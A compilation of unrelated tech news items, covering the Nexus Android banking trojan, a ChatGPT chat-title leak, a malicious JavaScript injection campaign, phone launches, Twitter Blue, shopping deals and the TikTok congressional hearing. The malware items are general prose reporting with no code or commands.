It first appeared in June last year and is now being openly advertised by its creators on hacker forums to increase its reach. Nexus’ primary targets are 450 banking and cryptocurrency apps.
It’s being distributed through phishing websites posing as legitimate websites of YouTube Vanced, a discontinued third-party YouTube app. It uses all the tricks in the books to gain your banking info and take over your financial accounts.
Nexus asks for 50 permissions and abuses at least 14 of them
It is capable of performing overlay attacks, i.e. replicating a legitimate interface to trick you into entering your credentials, and uses keylogging to record your keystrokes. It can even steal SMS messages to get access to two-factor authentication codes and can abuse Accessibility Services to steal information from crypto wallets, 2-Step Verification codes generated by Google Authenticator, and website cookies. The trojan can also delete messages received by you.
After it’s installed on a device, Nexus connects to its command-and-control (C2) server. C2s are used by cybercriminals to control malware, launch attacks, and receive stolen data.
Nexus is said to be in the beta stage but it’s already being used by many threat actors to carry out nefarious activities. Cybercriminals who do not know how to make their own malware can rent it for $3,000 a month.
It looks like the developer is from a CIS (Commonwealth of Independent States) country and has prohibited the trojan’s use in Azerbaijan, Armenia, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Russian Federation, Tajikistan, Uzbekistan, Ukraine, and Indonesia.
Nexus is capable of updating itself and Cleafy thinks it is a real threat and can infect hundreds of Android devices in the world.
To protect yourself from infections, try to only download apps from Google Play and enable Google Play Protect. Use strong passwords and enable biometric security features where possible and be very careful when granting permissions.
ChatGPT suddenly started showing users the titles of other users’ chats.
New gadgets and software come with new bugs, especially if they’re rushed. We can see this very clearly in the race between tech giants to push large language models (LLMs) like ChatGPT and its competitors out the door. In the most recently revealed LLM bug, ChatGPT allowed some users to see the titles of other users’ conversations.
LLMs are huge deep-neural-networks, which are trained on the input of billions of pages of written material.
In the words of ChatGPT itself:
“The training process involves exposing the model to vast amounts of text data, such as books, articles, and websites. During training, the model adjusts its internal parameters to minimize the difference between the text it generates and the text in the training data. This allows the model to learn patterns and relationships in language, and to generate new text that is similar in style and content to the text it was trained on.”
We have written before about tricking LLMs in to behaving in ways they aren’t supposed to. We call that jailbreaking. And I’d say that’s fine. It’s all part of what could be seen as a beta-testing phase for these complex new tools. And as long as we report the ways in which we are able to exceed the limitations of the model and give the developers a chance to tighten things up, we’re working together to make the models better.
But, when a model spills information about other users we stumble into an area that should have been sealed off already.
To understand better what has happened, it is necessary to have some basic working knowledge about how these models work. To improve the quality of the responses they get, users can organize the conversations they have with the LLM into a type of thread, so that the model, and the user, can look back and see what ground they have covered and what they are working on.
With ChatGPT, each conversation with the chatbot is stored in the user’s chat history bar where it can be revisited later. This gives the user an opportunity to work on several subjects and keep them organized and separate.
The history was unavailable for a while
Showing this history to other users would, at the very least, be annoying and unacceptable, because it could be embarrassing or even give away sensitive information.
Did I ask ChatGPT what to get my wife for Valentine’s Day?
Nevertheless, this is exactly what happened. At some point, users started noticing items in their history that weren’t their own.
Although OpenAI reassured users that others could not access the actual chats, users were understandably worried about their privacy.
OpenAI CEO Sam Altman said the company feels “awful”, but the “significant” error has now been fixed.
Things to remember
Giant, interactive LLMs like ChatGPT are still in the early stages of development and, despite what some want us to believe, they are neither the answer to everything nor the end of the world. At this point they are just very limited search engines that rephrase what they found about the subject you asked about, unlike an “old-fashioned” search engine that shows you possible sources of information and you can decide which ones are trustworthy and which ones aren’t.
When you are using any of the LLMs, remind yourself that they are still very much in a testing phase. Which means:
Do not feed it private or sensitive information about yourself or your employer. Other leaks are likely and may be even more embarrassing.
Take the results with more than just a grain of salt. Because the models don’t provide sources of information, you can’t know where it’s ideas came from.
Make yourself familiar with the LLM’s limitations. It helps to understand how up to date the information it uses is and the subjects it can’t converse freely about.
Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.
Researchers from Unit 42 have been monitoring a widespread campaign of harmful JavaScript (JS) injections. The campaign aims to redirect unsuspecting victims to dangerous content, including adware and fraudulent pages.
Websites continue to be infected by this threat in 2023, as it was active throughout 2022. The malicious JS code was discovered on over 51,000 websites, with several hundred appearing in Tranco’s top 1 million ranked websites.
The potential impact of this campaign is significant, as the presence of affected websites in Tranco suggests a widespread reach.
The campaign’s complexity lies in its multi-stage injection process, which precedes redirecting harmful web pages as an additional means of evading detection, obfuscation, and benign append attacks were employed.
Impact of the campaign on user
Experts have identified multiple versions of a campaign involving malicious JS code injection into websites by threat actors. During the year 2020, the campaign was observed for the first time.
170,000 URLs and 51,000 hostnames have been identified as part of this campaign since its inception in 2022.
A peak of over 4,000 daily URLs was generated as a result of this campaign between May and August 2022.
The impact of this campaign has been substantial, with hundreds of infected websites appearing in Tranco’s top one million ranked sites, indicating a potentially wide reach among internet users.
In January 2023, approximately 240,000 website sessions were prevented across 14,773 devices due to blocking measures taken against these websites.
Technical analysis
A malicious payload was hidden in the injected JS code, which was obfuscated to bypass detection and remain undetected. A malicious JS is loaded from a URL obscured by the obfuscated code.
As part of the code, the malicious JS is dynamically added to the DOM structure, which is also included in the code.
On certain websites, obfuscated JS snippets have been found to be injected into commonly used utility JS files, as per observations. Appending malicious code to extensive sections of benign code, also called a benign append attack, is a common tactic malware authors employ.
It can be used by malware authors to avoid detection by security crawlers and remain undetected. In each JS code snippet, the injected JS code appends external malicious JS code through DOM manipulation.
A malicious payload can be changed in this manner, providing the attacker greater flexibility. In its more recent version, this campaign injects malicious JS code into a website for malicious purposes.
Upon executing the final payload, users are redirected to various websites before reaching a destination webpage, often consisting of adware or a fraudulent page.
This page displays false information that may deceive individuals into granting permission for a malicious website to send browser notifications under the control of an attacker.
The researchers at Unit 42 believe that many websites are susceptible to security breaches due to vulnerabilities in one or more CMS plugins.
The researchers at Sucuri have discovered that exactly the same technique was used to exploit CMS plugins in a similar campaign. The threat actors responsible for creating malware have produced multiple variations of the harmful JavaScript code they injected into websites during this campaign.
Detecting different variants of the same attack is a robust characteristic of deep learning techniques often used to detect intrusions.
In order to prevent malicious JS injections, deep learning techniques could be applied to increase the detection rate.
As many of you know by now, Huawei announced its new flagship offerings yesterday. The Huawei Mate X3 foldable smartphone got announced, alongside three Huawei P60 series devices, and the Huawei Watch Ultimate. Some other devices got presented, but these are the ones that stole the show. Well, Huawei has confirmed that global variants of the Mate X3 and P60 series will be coming on May 9.
Global versions of Huawei Mate X3 & P60 series will launch on May 9
Do note that the company reached out to us to confirm it, we haven’t seen it on Huawei’s social media network channels just yet. The company said that the event will take place in Munich, Germany, though we still don’t know at what time exactly. That confirmation will likely come later on.
Just to be clear, the company said that “overseas versions” of “a number of new products” that launched in China, will be announced during this event. It did not name devices specifically, so do note that.
The Huawei Watch Ultimate was already announced for global markets, at the same time as the event in China yesterday. We already know it will go on sale on March 28, and that it will be quite pricey.
The Huawei Mate X3 has a lot to offer from the design standpoint
More people are probably interested in Huawei’s flagship smartphones, though. The Huawei Mate X3 managed to shock us yesterday, as it was announced as the thinnest book-style foldable, and also one of the lightest large foldables in the market. Well, probably the lightest one.
That’s only scratching the surface, though, as the phone truly does have a lot to offer. The Huawei P60 series is also rather interesting. Huawei opted for a somewhat odd naming scheme these days, by introducing the ‘Art’ model as the highest-end P60 device.
It remains to be seen if all three P60 devices will launch in Europe, or just one or two. The Mate X3 will be coming, almost certainly, so get ready for that.
Twitter made two big announcements today. Firstly, its premium subscription service Twitter Blue is now available globally. Anyone can pay the company to unlock some extra features and add a blue tick next to their handle. Second, the social network is removing legacy verified checkmarks starting on April 1. Accounts that were verified before Elon Musk took over the company will lose their blue checkmarks unless they subscribe to Twitter Blue.
Both of these changes have been a long-time coming. By a long time, we mean since Twitter changed ownership in late October 2022. Elon Musk made it clear that the company will scrap the existing account verification system and will instead sell the blue tick as part of Twitter Blue, which he sees as a big revenue stream. “The way in which they were given out was corrupt and nonsensical,” the billionaire said about the legacy checkmarks said in December. He repeated the “corrupt” remark last month too.
The first part of the plan was to make Twitter Blue available for everyone before removing the legacy blue ticks. The firm has rapidly expanded the subscription system in recent months, finally bringing it to Android in January this year. Today, the service has gone global. “Twitter Blue is now available globally! Sign up today to get your blue checkmark, prioritized ranking in conversations, half ads, long Tweets, Bookmark Folders, custom navigation, Edit Tweet, Undo Tweet, and more,” Twitter Blue tweeted Thursday afternoon.
Twitter will start removing legacy blue checkmarks on April Fool’s Day
With the subscription service available globally, Twitter has announced the second part of the plan as well. Starting this April Fool’s Day, it will no longer honor the coveted checkmark that users earned after meeting several criteria established by the company. Instead, it is forcing them to buy a Twitter Blue subscription to keep the blue tick. “On April 1st, we will begin winding down our legacy verified program and removing legacy verified checkmarks. To keep your blue checkmark on Twitter, individuals can sign up for Twitter Blue,” Twitter Verified tweeted just hours later.
Twitter Blue costs $8 a month ($11 a month if you subscribe through the Android or iOS app). It gives you everything that the company mentioned in the tweet above. You need to verify your identity with a phone number for the blue tick, though. For governmental and organizational accounts, Twitter has introduced a new grey checkmark. Heads of state, ministers, national-level cabinet members, official spokespersons, company headquarters, regional and country-level institutional accounts, and multilateral individuals are among those eligible for grey checkmarks.
OnePlus has confirmed that it will launch two new ‘Nord’ devices on April 4. We already know what products, actually. OnePlus is to blame for that, as it already kind of listed both of them on its website.
OnePlus is planning to launch two ‘Nord’ devices on April 4
The devices in question are the OnePlus Nord CE 3 Lite and the OnePlus Buds 2. OnePlus has already published pictures of both of those devices on its website. The company, however, did not share any other details. We knew about the CE 3 Lite since earlier this month, but the Buds 2 were not confirmed, until now.
These will launch in India, at least at first. They will also be quite affordable, these are ‘Nord’ devices after all. The OnePlus Nord CE 3 Lite will be available in a Pastel Lime color, while the earbuds will sell in Black and White colors. You can check out both devices in the gallery below.
The phone will have two camera islands on the back, hosting three cameras, it would seem. The OnePlus Buds 2, on the other hand, will look basically like the first-gen model. We do expect some improvements on the inside, though, of course.
The phone will include a 120Hz display, 67W charging & a 108MP camera
The company did not share any spec info regarding these products, but the OnePlus Nord CE 3 Lite specs did surface recently. The device will feature a 6.7-inch fullHD+ LCD display, it seems. It will feature a 120Hz refresh rate, by the way.
A 5,000mAh battery was also mentioned, and 67W fast wired charging will be supported. The Snapdragon 695 will fuel the device, while you’ll be able to choose between 6GB and 8GB RAM flavors. Those two models will ship with 128GB and 256GB of internal storage, respectively. Also, the storage will be expandable.
A 108-megapixel main camera will sit on the back. It will be backed by two 2-megapixel units. We still don’t have the details on those. A single 16-megapixel camera will sit on the front.
Android 13 will come pre-installed on the phone, along with OxygenOS 13. You can also expect two SIM card slots to be available. We don’t have the OnePlus Buds 2 details yet.
Today, Amazon has the iRobot Roomba i4+ on sale today for $399. That’s going to save you $250 off of the regular price. That is also the cheapest the Roomba i4+ has ever been. Making this a really great time to pick one up.
That’s a pretty solid price for the Roomba i4+. iRobot claims that the Roomba i4+ is perfect for those that have pets. THat’s because it does not use a single bristle brush. And instead uses the multi-surface rubber brushes that are able to flex to adjust to different floor types. So why is this good for pets? It doesn’t get pet hair tangled in the brush. Which is a really big deal honestly.
Other than that, the Roomba i4+ also has all of the features that you’d expect from iRobot. That includes voice commands with Google Assistant and Alexa. There’s also schedules available, so you can have your Roomba clean at specific times, on specific days. iRobot claims that it has about 10x the power-lifting suction power when compared to the Roomba 600 series.
This is the plus model, which means that it also comes with the auto-empty dock. So when the iRobot Roomba i4+ docks, it will go ahead and empty the dustbin. Which is very convenient and it can also hold about 60 days worth of debris before it needs to be emptied.
Whether you’re relaxing at home or out enjoying life, the Roomba i4 plus EVO robot vacuum takes care of stubborn dirt and messes with a Premium 3-Stage Cleaning System and 10x the Power-Lifting Suction. Compared to the Roomba 600 series cleaning system. The Roomba i4 plus EVO takes vacuuming off your mind with personalized cleaning suggestions powered by the unique intelligence of iRobot OS. Learns your habits and your routines.
You can pick up the iRobot Roomba i4+ robot vacuum from Amazon today by clicking here.
The Google Pixel Tablet is set to launch later this year, and we’re all looking forward to it. So far, we know a little bit about how it’s going to look, but we don’t know too much about how it’s going to function. Well, thanks to a leak from 9To5Google, we know a little bit about the Hub Mode for the Pixel Tablet.
Rumor has it that there will be two docks available when the Pixel Tablet launches. One of them will only power the device while the other one will act as a speaker as well. Both of them will put the tablet into Hub Mode. This is when you’ll be using the tablet as a smart display.
Thanks to Snoopy Tech, we have some leaked images of the dock. We’re not sure which variant of the dock we’re seeing, but there’s a chance that it’s the one only for powering it. It looks just like what we’ve seen in the promotional images. It’s predominantly pill-shaped with a fabric material on the outside. On the front of the dock, we see the four connector pins that will hold the tablet.
On the back, we see the Google logo along with the power port. There’s also a Google logo on the bottom. If this model only powers the tablet, then the one with the built-in speaker might be a bit bigger. We’ll just have to wait and see.
Here’s how Hub Mode could look on the Pixel Tablet
This was discovered from an APK deep dive by 9T05Google, so you’ll want to take this with a grain of salt. There are some strings hidden in the Google Home app right now that hint at some of the possible functionality of the Hub Mode. For starters, one string states that when docked, the voice match feature will only apply to the admin. All of the other people will be treated as guests.
The other strings in the app read:
<string name=”tky_device_toggle_subtitle_filters”>On Pixel Tablets, filters only apply in Hub Mode. %1$s</string>
<string name=”tky_filters_subtitle_calls”>The calls setting doesn\u2019t apply to Pixel Tablets. %1$s</string> <string name=”tky_filters_subtitle_news”>The news setting doesn\u2019t apply to Pixel Tablets. %1$s</string> <string name=”tky_filters_subtitle_podcasts”>The podcasts setting doesn\u2019t apply to Pixel Tablets. %1$s</string> <string name=”tky_filters_subtitle_websites”>The websites setting doesn\u2019t apply to Pixel Tablets. %1$s</string>
Amazon’s Spring Cleaning Sale is a great time to stock up on all the cleaning supplies you need to get your home ready for spring. With a wide variety of products on sale, you’re sure to find everything you need at a great price.
In this sale, you can save on all sorts of everyday essentials, including paper towels, trash bags, freezer bags, dish soap, adult toilet wipes, scrub sponges and so much more. And the majority of these are 20% or more off of their regular price. So definitely a good time to stock up.
These are mostly Amazon Basics and other Amazon Brands that are on sale. But you can get a 50-pack of 30-gallon trash bags for just $10.30. As far as tall kitchen trash bags go, there are a few options, including a pack of 90 for just $14.16.
If you’re in need of some toilet paper, the Presto mega rolls are here. You’ll get 24 rolls for just $23.76. It’s basically four packs of 6 here. Which is going to give you 96 rolls of regular toilet paper. Definitely a steal here.
When it comes to dish soap, the Amazon Basics Dish Soap is available for $11.98. This price increase four 30 fl oz bottles of dish soap. Speaking of dish soap, Presto also has dishwasher pacs on sale for $13.89. You’ll get 70 pacs for that price, and this is the triple-action detergent pacs. So you don’t even need to rinse your dishes before you put them into the dishwasher. Which is really good.
These are just a few of the very many everyday essentials that are currently on sale over at Amazon. Head on over using the link below and stock up your pantry and cabinets with these everyday essentials. You’re going to need them anyways, so might as well buy them now while they are cheap.
TikTok CEO Shou Chew testified before Congress on Thursday amid growing concerns over the app‘s future in the US. Lawmakers grilled Chew for more than five hours but the concerns largely remained unanswered. The TikTok executive repeated statements from his written testimony saying that the video-based social media platform or its Chinese parent company ByteDance doesn’t have any backdoors for China’s CCP (Chinese Communist Party) led government, and it did little to satisfy the lawmakers.
TikTok CEO failed to satisfy the US lawmakers at his first Congressional hearing
Calling for a nationwide ban on TikTok, House Energy and Commerce Committee chair and representative Cathy Rodgers said that “ByteDance is beholden to the CCP, and ByteDance and TikTok are one and the same”. She made the remarks in her opening statements during the Congressional hearing yesterday. She suggested that CCP could gain access to the personal data of American TikTok users through ByteDance. In response, TikTok CEO, who stated in his written testimony that “ByteDance is not an agent of China,” pointed to Project Texas.
Project Texas is TikTok’s plan to keep data of US users within the US. It has teamed up with Texas-based software company Oracle to safeguard the data in the latter’s servers. The data would be inaccessible to anyone outside the US. Expected to be completed later this year, TikTok officials say this would do more to protect American users than an outright ban for the app. However, the plan has been in the works for over a year now and nothing has materialized. Unsurprisingly, lawmakers are losing patience and trust in the company.
During the hearing, committee members were all skeptical of TikTok’s plan to address America’s national security concerns. Rodgers branded it a “marketing scheme,” while Representative Frank Pallone said, “Project Texas is simply not acceptable”. Representative Angie Craig also echoed these sentiments saying that the plan “doesn’t pass the smell test”. These disagreements continued throughout the nearly six-hour showdown. Chew also frustrated lawmakers by declining to answer several “rapid-fire” questions with a Yes or No.
When asked whether ByteDance was a Chinese company, he said that it’s a “global” firm with a Chinese founder. Similarly, he refused to directly answer whether ByteDance employees had spied on American journalists, something the company admitted doing a few months back. “I don’t think ‘spying’ is the right way to describe it,” Chew said. “This is ultimately an internal investigation”. Of course, this statement sparked sharp criticism. TikTok quickly took to Twitter to point out that Chew firmly said “no” when asked if it spied on behalf of the CCP.
Chew pointed to recent updates when asked about teen safety
The TikTok CEO similarly dodged many other complex questions from Congress members, including one about the inner workings of ByteDance and its China-based employees, Engadget reports. He was also pressed with questions about teen safety. He was asked about the platform’s moderation practices and potentially harmful “challenges” that go viral on the platform.
Chew pointed to various changes and updates TikTok has pushed recently. He talked about the dedicated STEM (science, technology, engineering, and math) feed, screen time limit, and more. The TikTok CEO also mentioned the platform’s newly-added algorithm reset button. Users can make the app forget everything it has learned about them and start afresh, should they feel unsafe with the content they currently see in the algorithmic feed.
However, none of this was enough to address the lawmakers’ national security concerns. Some have called for a sale of TikTok in the US, though Chinese officials have opposed the idea. Chew, meanwhile, said: “We will need to look at this because Project Texas is designed to move forward here in the United States and we are not discussing this”. As things stand, TikTok’s future is uncertain even after the hours-long grilling of its CEO by lawmakers. We’ll have to wait and see what’s next.
%20on%2051,000%20Websites.webp)
